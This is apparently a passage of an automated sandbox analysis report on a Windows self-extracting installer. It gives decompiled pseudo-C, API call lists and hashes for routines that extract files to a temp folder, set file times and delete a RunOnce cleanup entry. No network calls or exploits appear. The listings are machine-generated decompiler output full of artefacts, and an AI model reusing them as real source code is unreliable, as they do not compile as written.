                                • Part of subcall function 00A7468F: LoadResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746CC
                                • Part of subcall function 00A7468F: LockResource.KERNEL32(00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746D3
                                • Part of subcall function 00A7468F: memcpy_s.MSVCRT ref: 00A746E5
                                • Part of subcall function 00A7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746EF
                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A72F4D,?,00000002,00000000), ref: 00A75201
                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A75250
                                • Part of subcall function 00A744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
                                • Part of subcall function 00A744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
                                • Part of subcall function 00A76285: GetLastError.KERNEL32(00A75BBC), ref: 00A76285
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                              • String ID: <None>$UPROMPT
                              • API String ID: 957408736-2980973527
                              • Opcode ID: 06d96f73a0e236f3ba65a5caea18c9a65de027d80bf9544630cb362e4cbb95ee
                              • Instruction ID: a0875dfd0e32e14c5b99041bd605fe9941d35f558abf0f281379104bc2b52ac0
                              • Opcode Fuzzy Hash: 06d96f73a0e236f3ba65a5caea18c9a65de027d80bf9544630cb362e4cbb95ee
                              • Instruction Fuzzy Hash: BE1108B1B006017BE354ABB15D45F7B62DDDBD9340F50C439F60ED5191EBB98C425168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 74%
                              			E00A752B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                              				signed int _v8;
                              				char _v268;
                              				signed int _t9;
                              				signed int _t11;
                              				void* _t21;
                              				void* _t29;
                              				CHAR** _t31;
                              				void* _t32;
                              				signed int _t33;
                              
                              				_t28 = __edi;
                              				_t22 = __ecx;
                              				_t21 = __ebx;
                              				_t9 =  *0xa78004; // 0x74742267
                              				_v8 = _t9 ^ _t33;
                              				_push(__esi);
                              				_t31 =  *0xa791e0; // 0x2e18408
                              				if(_t31 != 0) {
                              					_push(__edi);
                              					do {
                              						_t29 = _t31;
                              						if( *0xa78a24 == 0 &&  *0xa79a30 == 0) {
                              							SetFileAttributesA( *_t31, 0x80); // executed
                              							DeleteFileA( *_t31); // executed
                              						}
                              						_t31 = _t31[1];
                              						LocalFree( *_t29);
                              						LocalFree(_t29);
                              					} while (_t31 != 0);
                              					_pop(_t28);
                              				}
                              				_t11 =  *0xa78a20; // 0x0
                              				_pop(_t32);
                              				if(_t11 != 0 &&  *0xa78a24 == 0 &&  *0xa79a30 == 0) {
                              					_push(_t22);
                              					E00A71781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                              					if(( *0xa79a34 & 0x00000020) != 0) {
                              						E00A765E8( &_v268);
                              					}
                              					SetCurrentDirectoryA(".."); // executed
                              					_t22 =  &_v268;
                              					E00A72390( &_v268);
                              					_t11 =  *0xa78a20; // 0x0
                              				}
                              				if( *0xa79a40 != 1 && _t11 != 0) {
                              					_t11 = E00A71FE1(_t22); // executed
                              				}
                              				 *0xa78a20 =  *0xa78a20 & 0x00000000;
                              				return E00A76CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                              			}












                              0x00a752b6
                              0x00a752b6
                              0x00a752b6
                              0x00a752c1
                              0x00a752c8
                              0x00a752cb
                              0x00a752cc
                              0x00a752d4
                              0x00a752d6
                              0x00a752d7
                              0x00a752de
                              0x00a752e0
                              0x00a752f2
                              0x00a752fa
                              0x00a752fa
                              0x00a75302
                              0x00a75305
                              0x00a7530c
                              0x00a75312
                              0x00a75316
                              0x00a75316
                              0x00a75317
                              0x00a7531c
                              0x00a7531f
                              0x00a75333
                              0x00a75345
                              0x00a75351
                              0x00a75359
                              0x00a75359
                              0x00a75363
                              0x00a75369
                              0x00a7536f
                              0x00a75374
                              0x00a75374
                              0x00a75381
                              0x00a75387
                              0x00a75387
                              0x00a7538f
                              0x00a753a0

                              APIs
                              • SetFileAttributesA.KERNELBASE(02E18408,00000080,?,00000000), ref: 00A752F2
                              • DeleteFileA.KERNELBASE(02E18408), ref: 00A752FA
                              • LocalFree.KERNEL32(02E18408,?,00000000), ref: 00A75305
                              • LocalFree.KERNEL32(02E18408), ref: 00A7530C
                              • SetCurrentDirectoryA.KERNELBASE(00A711FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A75363
                              Strings
                              • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00A75334
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                              • API String ID: 2833751637-3647970563
                              • Opcode ID: d110ceba95dd97f385a86f693945b9e21464f8e1ad33d642476870009c65389a
                              • Instruction ID: 1d45f4b4ef7852e3a54c3ef4b1736d75a7dea65fdba91557c0fdc93a95714918
                              • Opcode Fuzzy Hash: d110ceba95dd97f385a86f693945b9e21464f8e1ad33d642476870009c65389a
                              • Instruction Fuzzy Hash: E621CF31901A04EBDB20DBB4DD19B6A37B4BB50391F04C66AE44E5A1B0CBF45CC7CB80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A71FE1(void* __ecx) {
                              				void* _v8;
                              				long _t4;
                              
                              				if( *0xa78530 != 0) {
                              					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                              					if(_t4 == 0) {
                              						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                              						return RegCloseKey(_v8);
                              					}
                              				}
                              				return _t4;
                              			}





                              0x00a71fee
                              0x00a72005
                              0x00a7200d
                              0x00a72017
                              0x00000000
                              0x00a72020
                              0x00a7200d
                              0x00a72029

                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00A7538C,?,?,00A7538C), ref: 00A72005
                              • RegDeleteValueA.KERNELBASE(00A7538C,wextract_cleanup1,?,?,00A7538C), ref: 00A72017
                              • RegCloseKey.ADVAPI32(00A7538C,?,?,00A7538C), ref: 00A72020
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: CloseDeleteOpenValue
                              • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                              • API String ID: 849931509-1592051331
                              • Opcode ID: bc096c7ed1b343bc4498c84f9b5df44b91d8536546963b58a3c836622fad1379
                              • Instruction ID: ad019cae8f3df2081ae960c95c0ac254182e31a328bcf3662f50d459d8aa1edb
                              • Opcode Fuzzy Hash: bc096c7ed1b343bc4498c84f9b5df44b91d8536546963b58a3c836622fad1379
                              • Instruction Fuzzy Hash: 22E04F34690318BBDB21CBD0EC0EF5E7B6DF750745F10C598B90DA0060EB655E96D715
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E00A74CD0(char* __edx, long _a4, int _a8) {
                              				signed int _v8;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t29;
                              				int _t30;
                              				long _t32;
                              				signed int _t33;
                              				long _t35;
                              				long _t36;
                              				struct HWND__* _t37;
                              				long _t38;
                              				long _t39;
                              				long _t41;
                              				long _t44;
                              				long _t45;
                              				long _t46;
                              				signed int _t50;
                              				long _t51;
                              				char* _t58;
                              				long _t59;
                              				char* _t63;
                              				long _t64;
                              				CHAR* _t71;
                              				CHAR* _t74;
                              				int _t75;
                              				signed int _t76;
                              
                              				_t69 = __edx;
                              				_t29 =  *0xa78004; // 0x74742267
                              				_t30 = _t29 ^ _t76;
                              				_v8 = _t30;
                              				_t75 = _a8;
                              				if( *0xa791d8 == 0) {
                              					_t32 = _a4;
                              					__eflags = _t32;
                              					if(_t32 == 0) {
                              						_t33 = E00A74E99(_t75);
                              						L35:
                              						return E00A76CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                              					}
                              					_t35 = _t32 - 1;
                              					__eflags = _t35;
                              					if(_t35 == 0) {
                              						L9:
                              						_t33 = 0;
                              						goto L35;
                              					}
                              					_t36 = _t35 - 1;
                              					__eflags = _t36;
                              					if(_t36 == 0) {
                              						_t37 =  *0xa78584; // 0x0
                              						__eflags = _t37;
                              						if(_t37 != 0) {
                              							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                              						}
                              						_t54 = 0xa791e4;
                              						_t58 = 0xa791e4;
                              						do {
                              							_t38 =  *_t58;
                              							_t58 =  &(_t58[1]);
                              							__eflags = _t38;
                              						} while (_t38 != 0);
                              						_t59 = _t58 - 0xa791e5;
                              						__eflags = _t59;
                              						_t71 =  *(_t75 + 4);
                              						_t73 =  &(_t71[1]);
                              						do {
                              							_t39 =  *_t71;
                              							_t71 =  &(_t71[1]);
                              							__eflags = _t39;
                              						} while (_t39 != 0);
                              						_t69 = _t71 - _t73;
                              						_t30 = _t59 + 1 + _t71 - _t73;
                              						__eflags = _t30 - 0x104;
                              						if(_t30 >= 0x104) {
                              							L3:
                              							_t33 = _t30 | 0xffffffff;
                              							goto L35;
                              						}
                              						_t69 = 0xa791e4;
                              						_t30 = E00A74702( &_v268, 0xa791e4,  *(_t75 + 4));
                              						__eflags = _t30;
                              						if(__eflags == 0) {
                              							goto L3;
                              						}
                              						_t41 = E00A7476D( &_v268, __eflags);
                              						__eflags = _t41;
                              						if(_t41 == 0) {
                              							goto L9;
                              						}
                              						_push(0x180);
                              						_t30 = E00A74980( &_v268, 0x8302); // executed
                              						_t75 = _t30;
                              						__eflags = _t75 - 0xffffffff;
                              						if(_t75 == 0xffffffff) {
                              							goto L3;
                              						}
                              						_t30 = E00A747E0( &_v268);
                              						__eflags = _t30;
                              						if(_t30 == 0) {
                              							goto L3;
                              						}
                              						 *0xa793f4 =  *0xa793f4 + 1;
                              						_t33 = _t75;
                              						goto L35;
                              					}
                              					_t44 = _t36 - 1;
                              					__eflags = _t44;
                              					if(_t44 == 0) {
                              						_t54 = 0xa791e4;
                              						_t63 = 0xa791e4;
                              						do {
                              							_t45 =  *_t63;
                              							_t63 =  &(_t63[1]);
                              							__eflags = _t45;
                              						} while (_t45 != 0);
                              						_t74 =  *(_t75 + 4);
                              						_t64 = _t63 - 0xa791e5;
                              						__eflags = _t64;
                              						_t69 =  &(_t74[1]);
                              						do {
                              							_t46 =  *_t74;
                              							_t74 =  &(_t74[1]);
                              							__eflags = _t46;
                              						} while (_t46 != 0);
                              						_t73 = _t74 - _t69;
                              						_t30 = _t64 + 1 + _t74 - _t69;
                              						__eflags = _t30 - 0x104;
                              						if(_t30 >= 0x104) {
                              							goto L3;
                              						}
                              						_t69 = 0xa791e4;
                              						_t30 = E00A74702( &_v268, 0xa791e4,  *(_t75 + 4));
                              						__eflags = _t30;
                              						if(_t30 == 0) {
                              							goto L3;
                              						}
                              						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                              						_t30 = E00A74C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                              						__eflags = _t30;
                              						if(_t30 == 0) {
                              							goto L3;
                              						}
                              						E00A74B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                              						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                              						__eflags = _t50;
                              						if(_t50 != 0) {
                              							_t51 = _t50 & 0x00000027;
                              							__eflags = _t51;
                              						} else {
                              							_t51 = 0x80;
                              						}
                              						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                              						__eflags = _t30;
                              						if(_t30 == 0) {
                              							goto L3;
                              						} else {
                              							_t33 = 1;
                              							goto L35;
                              						}
                              					}
                              					_t30 = _t44 - 1;
                              					__eflags = _t30;
                              					if(_t30 == 0) {
                              						goto L3;
                              					}
                              					goto L9;
                              				}
                              				if(_a4 == 3) {
                              					_t30 = E00A74B60( *((intOrPtr*)(_t75 + 0x14)));
                              				}
                              				goto L3;
                              			}































                              0x00a74cd0
                              0x00a74cdb
                              0x00a74ce0
                              0x00a74ce2
                              0x00a74cee
                              0x00a74cf2
                              0x00a74d0e
                              0x00a74d0e
                              0x00a74d11
                              0x00a74e83
                              0x00a74e88
                              0x00a74e98
                              0x00a74e98
                              0x00a74d17
                              0x00a74d17
                              0x00a74d1a
                              0x00a74d2f
                              0x00a74d2f
                              0x00000000
                              0x00a74d2f
                              0x00a74d1c
                              0x00a74d1c
                              0x00a74d1f
                              0x00a74dcb
                              0x00a74dd0
                              0x00a74dd2
                              0x00a74ddd
                              0x00a74ddd
                              0x00a74de3
                              0x00a74de8
                              0x00a74ded
                              0x00a74ded
                              0x00a74def
                              0x00a74df0
                              0x00a74df0
                              0x00a74df4
                              0x00a74df4
                              0x00a74df6
                              0x00a74df9
                              0x00a74dfc
                              0x00a74dfc
                              0x00a74dfe
                              0x00a74dff
                              0x00a74dff
                              0x00a74e03
                              0x00a74e08
                              0x00a74e0a
                              0x00a74e0f
                              0x00a74d03
                              0x00a74d03
                              0x00000000
                              0x00a74d03
                              0x00a74e18
                              0x00a74e20
                              0x00a74e25
                              0x00a74e27
                              0x00000000
                              0x00000000
                              0x00a74e33
                              0x00a74e38
                              0x00a74e3a
                              0x00000000
                              0x00000000
                              0x00a74e40
                              0x00a74e51
                              0x00a74e56
                              0x00a74e5b
                              0x00a74e5e
                              0x00000000
                              0x00000000
                              0x00a74e6a
                              0x00a74e6f
                              0x00a74e71
                              0x00000000
                              0x00000000
                              0x00a74e77
                              0x00a74e7d
                              0x00000000
                              0x00a74e7d
                              0x00a74d25
                              0x00a74d25
                              0x00a74d28
                              0x00a74d36
                              0x00a74d3b
                              0x00a74d40
                              0x00a74d40
                              0x00a74d42
                              0x00a74d43
                              0x00a74d43
                              0x00a74d47
                              0x00a74d4a
                              0x00a74d4a
                              0x00a74d4c
                              0x00a74d4f
                              0x00a74d4f
                              0x00a74d51
                              0x00a74d52
                              0x00a74d52
                              0x00a74d56
                              0x00a74d5b
                              0x00a74d5d
                              0x00a74d62
                              0x00000000
                              0x00000000
                              0x00a74d67
                              0x00a74d6f
                              0x00a74d74
                              0x00a74d76
                              0x00000000
                              0x00000000
                              0x00a74d7c
                              0x00a74d84
                              0x00a74d89
                              0x00a74d8b
                              0x00000000
                              0x00000000
                              0x00a74d94
                              0x00a74d99
                              0x00a74d9e
                              0x00a74da1
                              0x00a74daa
                              0x00a74daa
                              0x00a74da3
                              0x00a74da3
                              0x00a74da3
                              0x00a74db5
                              0x00a74dbb
                              0x00a74dbd
                              0x00000000
                              0x00a74dc3
                              0x00a74dc5
                              0x00000000
                              0x00a74dc5
                              0x00a74dbd
                              0x00a74d2a
                              0x00a74d2a
                              0x00a74d2d
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a74d2d
                              0x00a74cf8
                              0x00a74cfd
                              0x00a74d02
                              0x00000000

                              APIs
                              • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00A74DB5
                              • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00A74DDD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: AttributesFileItemText
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                              • API String ID: 3625706803-3647970563
                              • Opcode ID: ec20caba132b445cb0a3f633125b3ccffecb377d1ba0606f0557a447fdc594ac
                              • Instruction ID: f0a330b98edf0a97a4cb7b14abf8889ded796fc02c61c5fa2c046e4397ae6727
                              • Opcode Fuzzy Hash: ec20caba132b445cb0a3f633125b3ccffecb377d1ba0606f0557a447fdc594ac
                              • Instruction Fuzzy Hash: BA4126362002019BCB359F38DE546FA77A9EB4D310F04C669E8CE97296DB71DE8AC750
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A74C37(signed int __ecx, int __edx, int _a4) {
                              				struct _FILETIME _v12;
                              				struct _FILETIME _v20;
                              				FILETIME* _t14;
                              				int _t15;
                              				signed int _t21;
                              
                              				_t21 = __ecx * 0x18;
                              				if( *((intOrPtr*)(_t21 + 0xa78d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                              					L5:
                              					return 0;
                              				} else {
                              					_t14 =  &_v12;
                              					_t15 = SetFileTime( *(_t21 + 0xa78d74), _t14, _t14, _t14); // executed
                              					if(_t15 == 0) {
                              						goto L5;
                              					}
                              					return 1;
                              				}
                              			}








                              0x00a74c40
                              0x00a74c4a
                              0x00a74c8d
                              0x00000000
                              0x00a74c70
                              0x00a74c70
                              0x00a74c7e
                              0x00a74c86
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a74c8a

                              APIs
                              • DosDateTimeToFileTime.KERNEL32 ref: 00A74C54
                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A74C66
                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A74C7E
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Time$File$DateLocal
                              • String ID:
                              • API String ID: 2071732420-0
                              • Opcode ID: ba4f7567d0ea6de4d0454b9d1f9082e32d6a42c34af33b16be2b3bff8b18381e
                              • Instruction ID: c5d979bb94cf1ed4423e7304197837f293a22ad486c0648430fa702d5760094b
                              • Opcode Fuzzy Hash: ba4f7567d0ea6de4d0454b9d1f9082e32d6a42c34af33b16be2b3bff8b18381e
                              • Instruction Fuzzy Hash: 4FF0907270120CBFAB65DFB4CC48DBB77ACEB58340B44C52AA82DC1050EB30D954C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E00A7487A(CHAR* __ecx, signed int __edx) {
                              				void* _t7;
                              				CHAR* _t11;
                              				long _t18;
                              				long _t23;
                              
                              				_t11 = __ecx;
                              				asm("sbb edi, edi");
                              				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                              				if((__edx & 0x00000100) == 0) {
                              					asm("sbb esi, esi");
                              					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                              				} else {
                              					if((__edx & 0x00000400) == 0) {
                              						asm("sbb esi, esi");
                              						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                              					} else {
                              						_t23 = 1;
                              					}
                              				}
                              				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                              				if(_t7 != 0xffffffff || _t23 == 3) {
                              					return _t7;
                              				} else {
                              					E00A7490C(_t11);
                              					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                              				}
                              			}







                              0x00a74880
                              0x00a7488c
                              0x00a74894
                              0x00a748a0
                              0x00a748c9
                              0x00a748ce
                              0x00a748a2
                              0x00a748a8
                              0x00a748b7
                              0x00a748bc
                              0x00a748aa
                              0x00a748ac
                              0x00a748ac
                              0x00a748a8
                              0x00a748de
                              0x00a748e7
                              0x00a7490b
                              0x00a748ee
                              0x00a748f0
                              0x00000000
                              0x00a74902

                              APIs
                              • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00A74A23,?,00A74F67,*MEMCAB,00008000,00000180), ref: 00A748DE
                              • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00A74F67,*MEMCAB,00008000,00000180), ref: 00A74902
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: ed28127584b1ed42ce907f784ded4d309dbad96f70894fe9b2a525c22f13a7a3
                              • Instruction ID: f8e8d5faf9255a9f22cb5a69091e8ad8b1d8ae5c5b664ea7d93d8da85b8f6f5e
                              • Opcode Fuzzy Hash: ed28127584b1ed42ce907f784ded4d309dbad96f70894fe9b2a525c22f13a7a3
                              • Instruction Fuzzy Hash: 80014BA3E1157426F32481694C88FB7555CCBDA735F1B8335BEAEE71D1D6644C0481E1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E00A74AD0(signed int _a4, void* _a8, long _a12) {
                              				signed int _t9;
                              				int _t12;
                              				signed int _t14;
                              				signed int _t15;
                              				void* _t20;
                              				struct HWND__* _t21;
                              				signed int _t24;
                              				signed int _t25;
                              
                              				_t20 =  *0xa7858c; // 0x268
                              				_t9 = E00A73680(_t20);
                              				if( *0xa791d8 == 0) {
                              					_push(_t24);
                              					_t12 = WriteFile( *(0xa78d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                              					if(_t12 != 0) {
                              						_t25 = _a12;
                              						if(_t25 != 0xffffffff) {
                              							_t14 =  *0xa79400; // 0x5d600
                              							_t15 = _t14 + _t25;
                              							 *0xa79400 = _t15;
                              							if( *0xa78184 != 0) {
                              								_t21 =  *0xa78584; // 0x0
                              								if(_t21 != 0) {
                              									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xa793f8, 0);
                              								}
                              							}
                              						}
                              					} else {
                              						_t25 = _t24 | 0xffffffff;
                              					}
                              					return _t25;
                              				} else {
                              					return _t9 | 0xffffffff;
                              				}
                              			}











                              0x00a74ad5
                              0x00a74adb
                              0x00a74ae7
                              0x00a74aee
                              0x00a74b05
                              0x00a74b0d
                              0x00a74b14
                              0x00a74b1a
                              0x00a74b1c
                              0x00a74b21
                              0x00a74b2a
                              0x00a74b2f
                              0x00a74b31
                              0x00a74b39
                              0x00a74b54
                              0x00a74b54
                              0x00a74b39
                              0x00a74b2f
                              0x00a74b0f
                              0x00a74b0f
                              0x00a74b0f
                              0x00a74b5e
                              0x00a74ae9
                              0x00a74aed
                              0x00a74aed

                              APIs
                                • Part of subcall function 00A73680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A7369F
                                • Part of subcall function 00A73680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A736B2
                                • Part of subcall function 00A73680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A736DA
                              • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00A74B05
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                              • String ID:
                              • API String ID: 1084409-0
                              • Opcode ID: bd8be67854731608c0e78bfd8a09f2189f31491319429e1a312bd8d7387ae57f
                              • Instruction ID: 17bf76f5eadb2a884b5b757057ae0623a9fcfed9475e80c67154561d3b95f56c
                              • Opcode Fuzzy Hash: bd8be67854731608c0e78bfd8a09f2189f31491319429e1a312bd8d7387ae57f
                              • Instruction Fuzzy Hash: 1C014031340205ABDB14CF98DC09BA6B769E788725F14C225F93D971E1CB70DC92CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A7658A(char* __ecx, void* __edx, char* _a4) {
                              				intOrPtr _t4;
                              				char* _t6;
                              				char* _t8;
                              				void* _t10;
                              				void* _t12;
                              				char* _t16;
                              				intOrPtr* _t17;
                              				void* _t18;
                              				char* _t19;
                              
                              				_t16 = __ecx;
                              				_t10 = __edx;
                              				_t17 = __ecx;
                              				_t1 = _t17 + 1; // 0xa78b3f
                              				_t12 = _t1;
                              				do {
                              					_t4 =  *_t17;
                              					_t17 = _t17 + 1;
                              				} while (_t4 != 0);
                              				_t18 = _t17 - _t12;
                              				_t2 = _t18 + 1; // 0xa78b40
                              				if(_t2 < __edx) {
                              					_t19 = _t18 + __ecx;
                              					if(_t19 > __ecx) {
                              						_t8 = CharPrevA(__ecx, _t19); // executed
                              						if( *_t8 != 0x5c) {
                              							 *_t19 = 0x5c;
                              							_t19 =  &(_t19[1]);
                              						}
                              					}
                              					_t6 = _a4;
                              					 *_t19 = 0;
                              					while( *_t6 == 0x20) {
                              						_t6 = _t6 + 1;
                              					}
                              					return E00A716B3(_t16, _t10, _t6);
                              				}
                              				return 0x8007007a;
                              			}












                              0x00a76592
                              0x00a76594
                              0x00a76596
                              0x00a76598
                              0x00a76598
                              0x00a7659b
                              0x00a7659b
                              0x00a7659d
                              0x00a7659e
                              0x00a765a2
                              0x00a765a4
                              0x00a765a9
                              0x00a765b2
                              0x00a765b6
                              0x00a765ba
                              0x00a765c3
                              0x00a765c5
                              0x00a765c8
                              0x00a765c8
                              0x00a765c3
                              0x00a765c9
                              0x00a765cc
                              0x00a765d2
                              0x00a765d1
                              0x00a765d1
                              0x00000000
                              0x00a765dc
                              0x00000000

                              APIs
                              • CharPrevA.USER32(00A78B3E,00A78B3F,00000001,00A78B3E,-00000003,?,00A760EC,00A71140,?), ref: 00A765BA
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
